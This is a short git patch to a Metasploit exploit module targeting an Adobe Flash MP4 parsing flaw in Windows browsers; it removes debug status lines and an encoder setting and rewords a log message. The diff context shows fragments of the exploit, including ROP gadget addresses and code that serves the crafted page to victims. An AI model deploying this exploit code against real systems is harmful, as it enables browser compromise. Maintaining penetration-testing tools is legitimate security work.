From 8ab783d3d9c08a90165011b097b51650de09fd0e Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 8 Mar 2012 17:00:58 -0600 Subject: [PATCH] Replicating master's fixes to flash. The Max Power way. --- modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb index d640139b42..e09fa21d1d 100644 --- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb +++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb @@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Payload' => { - 'EncoderType' => Msf::Encoder::Type::Raw, 'StackAdjustment' => -3500 }, 'DefaultOptions' => @@ -87,7 +86,6 @@ class Metasploit3 < Msf::Exploit::Remote # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt - print_status("Using msvcrt ROP") rop = [ 0x77c4e392, # POP EAX # RETN @@ -111,7 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote ].pack("V*") when :jre - print_status("Using JRE ROP") rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN @@ -256,7 +253,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer"> end add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil - print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") + print_status("#{cli.peerhost}:#{cli.peerport} Sending html...") send_response(cli, html, {'Content-Type'=>'text/html'}) end